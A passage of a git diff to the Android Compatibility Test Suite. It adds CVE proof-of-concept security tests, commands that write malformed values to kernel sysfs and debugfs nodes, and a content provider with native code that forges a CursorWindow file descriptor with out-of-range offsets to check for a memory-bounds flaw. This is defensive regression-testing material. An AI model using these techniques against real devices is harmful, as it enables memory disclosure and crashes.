+ AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+ }
+ }
+
+ //Highs
+ /**
+ * b/31225246
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8412() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+ AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31243641
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8444() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+ AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31791148
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8448() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31798848
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8449() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+ AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32402548
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0403() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+ }
+
+ /**
+ * b/32510733
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0404() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/asound/version")) {
+ AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32178033
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8451() throws Exception {
+ enableAdbRoot(getDevice());
+ String command =
+ "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+
+ /**
+ * b/32659848
+ */
+ @SecurityTest
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..f8ed22a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,44 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_01 extends SecurityTestCase {
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32636619
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+ }
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b6599c1..5c84850 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -64,6 +64,17 @@
}
/**
+ * Check if a driver is present on a machine
+ */
+ public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+ String result = mDevice.executeShellCommand("ls -Zl " + driver);
+ if(result.contains("No such file or directory")) {
+ return false;
+ }
+ return true;
+ }
+
+ /**
* Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
* (due to rounding) of the previous boottime to check if The phone has crashed.
*/
diff --git a/hostsidetests/services/activitymanager/app/AndroidManifest.xml b/hostsidetests/services/activitymanager/app/AndroidManifest.xml
index 2804d3b..6e9aead 100755
--- a/hostsidetests/services/activitymanager/app/AndroidManifest.xml
+++ b/hostsidetests/services/activitymanager/app/AndroidManifest.xml
@@ -159,8 +159,6 @@
android:exported="true"
android:launchMode="singleInstance"
/>
- <activity android:name=".MultiWindowSupportObserver"
- android:exported="true" />
</application>
</manifest>
diff --git a/hostsidetests/services/activitymanager/app/src/android/server/app/MultiWindowSupportObserver.java b/hostsidetests/services/activitymanager/app/src/android/server/app/MultiWindowSupportObserver.java
deleted file mode 100644
index 0d54912..0000000
--- a/hostsidetests/services/activitymanager/app/src/android/server/app/MultiWindowSupportObserver.java
+++ /dev/null
@@ -1,18 +0,0 @@
-package android.server.app;
-
-import android.app.Activity;
-import android.content.res.Resources;
-import android.os.Bundle;
-import android.util.Log;
-
-public class MultiWindowSupportObserver extends Activity {
- @Override
- protected void onCreate(Bundle savedInstanceState) {
- super.onCreate(savedInstanceState);
- int id = Resources.getSystem().getIdentifier("config_supportsMultiWindow", "bool", "android");
- boolean support = Resources.getSystem().getBoolean(id);
- Log.i(getClass().getSimpleName(), "HEAD=OK");
- Log.i(getClass().getSimpleName(), "DROP=OK");
- Log.i(getClass().getSimpleName(), "config_supportsMultiWindow="+support);
- }
-}
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java
index 09bb294..3a21fda 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerTestBase.java
@@ -26,9 +26,7 @@
import java.lang.Exception;
import java.lang.Integer;
import java.lang.String;
-import java.util.HashMap;
import java.util.HashSet;
-import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
@@ -80,11 +78,6 @@
protected ITestDevice mDevice;
private HashSet<String> mAvailableFeatures;
- final private String RESULT_KEY_HEAD = "HEAD";
- final private String SUPPORT_OBSERVER = "MultiWindowSupportObserver";
- private static boolean mConfigLoaded = false;
- private static boolean mSupportMultiWindow = true;
-
protected static String getAmStartCmd(final String activityName) {
return "am start -n " + getActivityComponentName(activityName);
@@ -225,68 +218,6 @@
|| PRETEND_DEVICE_SUPPORTS_FREEFORM;
}
- protected boolean supportsMultiWindowMode() {
- if (!mConfigLoaded) {
- try {
- executeShellCommand("am start -n " + "android.server.app/." + SUPPORT_OBSERVER);
- waitForResume("android.server.app", SUPPORT_OBSERVER);
- Map map = getLogResults(SUPPORT_OBSERVER);
- String value = (String)map.get(RESULT_KEY_HEAD);
- if (value != null && value.equals("OK")) {
- mConfigLoaded = true;
- mSupportMultiWindow = !map.get("config_supportsMultiWindow").equals("false");
- }
- executeShellCommand(AM_FORCE_STOP_TEST_PACKAGE);
- clearLogs();
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
- return mSupportMultiWindow;
- }
-
- private void clearLogs() throws DeviceNotAvailableException {
- executeShellCommand("logcat -c");
- }
-
- private Map<String, String> getLogResults(String className) throws Exception {
- int retryCount = 3;
- Map<String, String> output = new HashMap<String, String>();
- do {
-
- String logs = executeShellCommand("logcat -v brief -d " + className + ":I" + " *:S");
- for (String line : logs.split("\\n")) {
- if (line.startsWith("I/" + className)) {
- String payload = line.split(":")[1].trim();
- final String[] split = payload.split("=");
- if (split.length > 1) {
- output.put(split[0], split[1]);
- }
- }
- }
- if (output.containsKey(RESULT_KEY_HEAD)) {
- return output;
- }
- } while (retryCount-- > 0);
- return output;
- }
-
- private void waitForResume(String packageName, String activityName) throws Exception {
- final String fullActivityName = packageName + "." + activityName;
- int retryCount = 3;
- do {
- Thread.sleep(500);
- String logs = executeShellCommand("logcat -d -b events");
- for (String line : logs.split("\\n")) {
- if(line.contains("am_on_resume_called") && line.contains(fullActivityName)) {
- return;
- }
- }
- } while (retryCount-- > 0);
-
- throw new Exception(fullActivityName + " has failed to start");
- }
-
protected boolean hasDeviceFeature(String requiredFeature) throws DeviceNotAvailableException {
if (mAvailableFeatures == null) {
// TODO: Move this logic to ITestDevice.
diff --git a/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml b/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml
index a45b62f..296a979 100644
--- a/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml
+++ b/hostsidetests/services/windowmanager/dndsourceapp/AndroidManifest.xml
@@ -23,8 +23,7 @@
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
- <activity android:name=".MultiWindowSupportObserver"
- android:exported="true"/>
+
<provider android:name="android.wm.cts.dndsourceapp.DragSourceContentProvider"
android:authorities="android.wm.cts.dndsource.contentprovider"
android:grantUriPermissions="true"/>
diff --git a/hostsidetests/services/windowmanager/dndsourceapp/src/android/wm/cts/dndsourceapp/MultiWindowSupportObserver.java b/hostsidetests/services/windowmanager/dndsourceapp/src/android/wm/cts/dndsourceapp/MultiWindowSupportObserver.java
deleted file mode 100644
index b8bd3c6..0000000
--- a/hostsidetests/services/windowmanager/dndsourceapp/src/android/wm/cts/dndsourceapp/MultiWindowSupportObserver.java
+++ /dev/null
@@ -1,18 +0,0 @@
-package android.wm.cts.dndsourceapp;
-
-import android.app.Activity;
-import android.content.res.Resources;
-import android.os.Bundle;
-import android.util.Log;
-
-public class MultiWindowSupportObserver extends Activity {
- @Override
- protected void onCreate(Bundle savedInstanceState) {
- super.onCreate(savedInstanceState);
- int id = Resources.getSystem().getIdentifier("config_supportsMultiWindow", "bool", "android");
- boolean support = Resources.getSystem().getBoolean(id);
- Log.i(getClass().getSimpleName(), "HEAD=OK");
- Log.i(getClass().getSimpleName(), "DROP=OK");
- Log.i(getClass().getSimpleName(), "config_supportsMultiWindow="+support);
- }
-}
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index b63b633..8fc3264 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -52,10 +52,7 @@
private static final String SOURCE_PACKAGE_NAME = "android.wm.cts.dndsourceapp";
private static final String TARGET_PACKAGE_NAME = "android.wm.cts.dndtargetapp";
private static final String TARGET_23_PACKAGE_NAME = "android.wm.cts.dndtargetappsdk23";
- private static boolean mConfigLoaded = false;
- private final String SUPPORT_OBSERVER = "MultiWindowSupportObserver";
- private static boolean mSupportMultiWindow = true;
- private final String AM_FORCE_STOP_TEST_PACKAGE = "am force-stop android.wm.cts.dndsourceapp";
+
private static final String SOURCE_ACTIVITY_NAME = "DragSource";
private static final String TARGET_ACTIVITY_NAME = "DropTarget";
@@ -212,16 +209,8 @@
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
for (String line : output.split("\\n")) {
- final String truncatedLine;
- // Only look for the activity name before the "topActivity" string.
- final int pos = line.indexOf("topActivity");
- if (pos > 0) {
- truncatedLine = line.substring(0, pos);
- } else {
- truncatedLine = line;
- }
- if (truncatedLine.contains(name)) {
- return truncatedLine;
+ if (line.contains(name)) {
+ return line;
}
}
return "";
@@ -396,23 +385,4 @@
public void testGrantWriteRequestWrite() throws Exception {
doTestDragAndDrop(GRANT_WRITE, REQUEST_WRITE, RESULT_OK);
}
- protected boolean supportsMultiWindowMode() {
- if (!mConfigLoaded) {
- try {
- executeShellCommand("am start -n " + "android.wm.cts.dndsourceapp/." + SUPPORT_OBSERVER);
- waitForResume("android.wm.cts.dndsourceapp", SUPPORT_OBSERVER);
- Map map = getLogResults(SUPPORT_OBSERVER);
- String value = (String)map.get(RESULT_KEY_DROP_RESULT);
- if (value != null && value.equals("OK")) {
- mConfigLoaded = true;
- mSupportMultiWindow = !map.get("config_supportsMultiWindow").equals("false");
- }
- executeShellCommand(AM_FORCE_STOP_TEST_PACKAGE);
- clearLogs();
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
- return mSupportMultiWindow;
- }
}
diff --git a/hostsidetests/theme/assets/24/560dpi.zip b/hostsidetests/theme/assets/24/560dpi.zip
index 9a65c38..a171f7c 100644
--- a/hostsidetests/theme/assets/24/560dpi.zip
+++ b/hostsidetests/theme/assets/24/560dpi.zip
Binary files differ
diff --git a/hostsidetests/theme/assets/24/mdpi.zip b/hostsidetests/theme/assets/24/mdpi.zip
deleted file mode 100755
index 6e4528f..0000000
--- a/hostsidetests/theme/assets/24/mdpi.zip
+++ /dev/null
Binary files differ
diff --git a/tests/tests/content/Android.mk b/tests/tests/content/Android.mk
index d901926..98d067a 100644
--- a/tests/tests/content/Android.mk
+++ b/tests/tests/content/Android.mk
@@ -21,6 +21,8 @@
# and when built explicitly put it in the data partition
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+LOCAL_JNI_SHARED_LIBRARIES := libnativecursorwindow_jni libnativehelper_compat_libc++
+
LOCAL_JAVA_LIBRARIES := android.test.runner
LOCAL_STATIC_JAVA_LIBRARIES := android-support-v4 \
@@ -46,3 +48,5 @@
LOCAL_COMPATIBILITY_SUITE := cts
include $(BUILD_CTS_PACKAGE)
+
+include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index d4f203e..040eafa 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -219,6 +219,13 @@
</intent-filter>
</activity>
+ <provider
+ android:name="android.content.cts.CursorWindowContentProvider"
+ android:authorities="cursorwindow.provider"
+ android:exported="true"
+ android:process=":providerProcess">
+ </provider>
+
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/content/jni/Android.mk b/tests/tests/content/jni/Android.mk
new file mode 100644
index 0000000..4737b35
--- /dev/null
+++ b/tests/tests/content/jni/Android.mk
@@ -0,0 +1,30 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH:= $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libnativecursorwindow_jni
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := NativeCursorWindow.c
+
+LOCAL_C_INCLUDES := $(JNI_H_INCLUDE)
+
+LOCAL_SHARED_LIBRARIES := libnativehelper_compat_libc++ liblog
+LOCAL_CXX_STL := libc++_static
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/content/jni/NativeCursorWindow.c b/tests/tests/content/jni/NativeCursorWindow.c
new file mode 100644
index 0000000..a2fb92a
--- /dev/null
+++ b/tests/tests/content/jni/NativeCursorWindow.c
@@ -0,0 +1,99 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define LOG_TAG "NativeCursorWindow"
+
+#include <jni.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <linux/ashmem.h>
+#include <utils/Log.h>
+
+struct Header {
+ // Offset of the lowest unused byte in the window.
+ uint32_t freeOffset;
+
+ // Offset of the first row slot chunk.
+ uint32_t firstChunkOffset;
+
+ uint32_t numRows;
+ uint32_t numColumns;
+};
+
+struct RowSlot {
+ uint32_t offset;
+};
+
+#define ROW_SLOT_CHUNK_NUM_ROWS 100
+
+struct RowSlotChunk {
+ struct RowSlot slots[ROW_SLOT_CHUNK_NUM_ROWS];
+ uint32_t nextChunkOffset;
+};
+
+/* Field types. */
+enum {
+ FIELD_TYPE_NULL = 0,
+ FIELD_TYPE_INTEGER = 1,
+ FIELD_TYPE_FLOAT = 2,
+ FIELD_TYPE_STRING = 3,
+ FIELD_TYPE_BLOB = 4,
+};
+
+/* Opaque type that describes a field slot. */
+struct FieldSlot {
+ int32_t type;
+ union {
+ double d;
+ int64_t l;
+ struct {
+ uint32_t offset;
+ uint32_t size;
+ } buffer;
+ } data;
+} __attribute((packed));
+
+JNIEXPORT jint JNICALL
+Java_android_content_cts_CursorWindowContentProvider_makeNativeCursorWindowFd(JNIEnv *env, jclass clazz,
+jint offset, jint size, jboolean isBlob) {
+ int fd = open("/dev/ashmem", O_RDWR);
+ ioctl(fd, ASHMEM_SET_NAME, "Fake CursorWindow");
+
+ ioctl(fd, ASHMEM_SET_SIZE, 1024);
+
+ void *data = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+ struct Header *header = (struct Header *) data;
+ unsigned rowSlotChunkOffset = sizeof(struct Header);
+ struct RowSlotChunk *rowSlotChunk = (struct RowSlotChunk *)(data + rowSlotChunkOffset);
+ unsigned fieldSlotOffset = rowSlotChunkOffset + sizeof(struct RowSlotChunk);
+ struct FieldSlot *fieldSlot = (struct FieldSlot *) (data + fieldSlotOffset);
+
+ header->numRows = 1;
+ header->numColumns = 1;
+ header->firstChunkOffset = rowSlotChunkOffset;
+
+ rowSlotChunk->slots[0].offset = fieldSlotOffset;
+
+ fieldSlot->type = isBlob ? FIELD_TYPE_BLOB : FIELD_TYPE_STRING;
+ fieldSlot->data.buffer.offset = offset;
+ fieldSlot->data.buffer.size = size;
+
+ munmap(data, 1024);
+
+ return fd;
+
+}
diff --git a/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
new file mode 100644
index 0000000..004b193
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.database.Cursor;
+import android.database.sqlite.SQLiteException;
+import android.net.Uri;
+import android.test.AndroidTestCase;
+import android.util.Log;
+
+import java.io.IOException;
+
+/**
+ * Test {@link CursorWindowContentProvider} .
+ */
+public class ContentProviderCursorWindowTest extends AndroidTestCase {
+ private static final String TAG = "ContentProviderCursorWindowTest";
+
+ public void testQuery() throws IOException {
+ Cursor cursor = getContext().getContentResolver().query(
+ Uri.parse("content://cursorwindow.provider/hello"),
+ null, null, null, null
+ );
+ try {
+ cursor.moveToFirst();
+
+ int type = cursor.getType(0);
+ if (type != Cursor.FIELD_TYPE_BLOB) {
+ fail("Unexpected type " + type);
+ }
+ byte[] blob = cursor.getBlob(0);
+ Log.i(TAG, "Blob length " + blob.length);
+ fail("getBlob should fail due to invalid offset used in the field slot");
+ } catch (SQLiteException expected) {
+ Log.i(TAG, "Expected exception: " + expected);
+ } finally {
+ cursor.close();
+ }
+ }
+}
diff --git a/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
new file mode 100644
index 0000000..4266f35
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
@@ -0,0 +1,130 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.annotation.NonNull;
+import android.annotation.Nullable;
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.AbstractWindowedCursor;
+import android.database.Cursor;
+import android.database.CursorWindow;
+import android.net.Uri;
+import android.os.Parcel;
+import android.os.ParcelFileDescriptor;
+import android.util.Log;
+
+/**
+ * Content provider that uses a custom {@link CursorWindow} to inject file descriptor
+ * pointing to another ashmem region having window slots with references outside of allowed ranges.
+ *
+ * <p>Used in {@link ContentProviderCursorWindowTest}
+ */
+public class CursorWindowContentProvider extends ContentProvider {
+ private static final String TAG = "CursorWindowContentProvider";
+ static {
+ System.loadLibrary("nativecursorwindow_jni");
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection,
+ String[] selectionArgs, String sortOrder) {
+ AbstractWindowedCursor cursor = new AbstractWindowedCursor() {
+ @Override
+ public int getCount() {
+ return 1;
+ }
+
+ @Override
+ public String[] getColumnNames() {
+ return new String[] {"a"};
+ }
+ };
+ cursor.setWindow(new InjectingCursorWindow("TmpWindow"));
+ return cursor;
+ }
+
+ class InjectingCursorWindow extends CursorWindow {
+ InjectingCursorWindow(String name) {
+ super(name);
+ }
+
+ @Override
+ public void writeToParcel(Parcel dest, int flags) {
+ Parcel tmp = Parcel.obtain();
+
+ super.writeToParcel(tmp, flags);
+ tmp.setDataPosition(0);
+ // Find location of file descriptor
+ int fdPos = -1;
+ while (tmp.dataAvail() > 0) {
+ fdPos = tmp.dataPosition();
+ int frameworkFdMarker = tmp.readInt();
+ if (frameworkFdMarker == 0x66642a85 /* BINDER_TYPE_FD */) {
+ break;
+ }
+ }
+ if (fdPos == -1) {
+ tmp.recycle();
+ throw new IllegalStateException("File descriptor not found in the output of "
+ + "CursorWindow.writeToParcel");
+ }
+ // Write reply with replaced file descriptor
+ ParcelFileDescriptor evilFd = ParcelFileDescriptor
+ .adoptFd(makeNativeCursorWindowFd(1000, 1000, true));
+ dest.appendFrom(tmp, 0, fdPos);
+ dest.writeFileDescriptor(evilFd.getFileDescriptor());
+ tmp.setDataPosition(dest.dataPosition());
+ dest.appendFrom(tmp, dest.dataPosition(), tmp.dataAvail());
+ tmp.recycle();
+ }
+ }
+
+ private native static int makeNativeCursorWindowFd(int offset, int size, boolean isBlob);
+
+ // Stubs
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ Log.e(TAG, "delete() not implemented");
+ return 0;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ Log.e(TAG, "getType() not implemented");
+ return "";
+ }
+
+ @Override
+ public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
+ Log.e(TAG, "insert() not implemented");
+ return null;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection,
+ String[] selectionArgs) {
+ Log.e(TAG, "update() not implemented");
+ return 0;
+ }
+
+}
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
index 9b1dc81..7b74ba7 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
@@ -19,22 +19,11 @@
import android.annotation.TargetApi;
import android.content.Context;
-import android.cts.util.MediaUtils;
import android.graphics.Bitmap;
-import android.media.MediaFormat;
-import android.support.test.runner.AndroidJUnit4;
import android.util.Log;
import android.view.View;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Rule;
-import org.junit.rules.Timeout;
-import org.junit.runner.RunWith;
-import org.junit.Test;
-
@TargetApi(24)
-@RunWith(AndroidJUnit4.class)
public class DecodeAccuracyTest extends DecodeAccuracyTestBase {
private static final String TAG = DecodeAccuracyTest.class.getSimpleName();
@@ -43,17 +32,12 @@
private static final String H264_CROPPED_VIDEO_FILE_NAME = "520x360h264decodertest.mp4";
private static final int ALLOWED_GREATEST_PIXEL_DIFFERENCE = 90;
private static final int OFFSET = 10;
- private static final int PER_TEST_TIMEOUT_S = 30;
private View videoView;
private VideoViewFactory videoViewFactory;
- @Rule
- public Timeout globalTimeout = Timeout.seconds(PER_TEST_TIMEOUT_S);
-
- @After
@Override
- public void tearDown() throws Exception {
+ protected void tearDown() throws Exception {
if (videoView != null) {
getHelper().cleanUpView(videoView);
}
@@ -64,42 +48,36 @@
}
/* <------------- Tests Using H264 -------------> */
- @Test
public void testH264GLViewVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
new VideoFormat(H264_VIDEO_FILE_NAME));
}
- @Test
public void testH264GLViewLargerHeightVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264GLViewLargerWidthVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerWidthVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264SurfaceViewVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
new VideoFormat(H264_VIDEO_FILE_NAME));
}
- @Test
public void testH264SurfaceViewLargerHeightVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264SurfaceViewLargerWidthVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
@@ -107,42 +85,36 @@
}
/* <------------- Tests Using VP9 -------------> */
- @Test
public void testVP9GLViewVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
new VideoFormat(VP9_VIDEO_FILE_NAME));
}
- @Test
public void testVP9GLViewLargerHeightVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9GLViewLargerWidthVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerWidthVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9SurfaceViewVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
new VideoFormat(VP9_VIDEO_FILE_NAME));
}
- @Test
public void testVP9SurfaceViewLargerHeightVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
}
- @Test
public void testVP9SurfaceViewLargerWidthVideoDecode() throws Exception {
runVP9DecodeAccuracyTest(
new SurfaceViewFactory(),
@@ -150,14 +122,12 @@
}
/* <------------- Tests H264 with cropping -------------> */
- @Test
public void testH264GLViewCroppedVideoDecode() throws Exception {
runH264DecodeCroppedTest(
new GLSurfaceViewFactory(),
new VideoFormat(H264_CROPPED_VIDEO_FILE_NAME));
}
- @Test
public void testH264SurfaceViewCroppedVideoDecode() throws Exception {
runH264DecodeCroppedTest(
new SurfaceViewFactory(),
@@ -166,23 +136,17 @@
private void runH264DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
}
private void runVP9DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_VP9)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
}
private void runH264DecodeCroppedTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
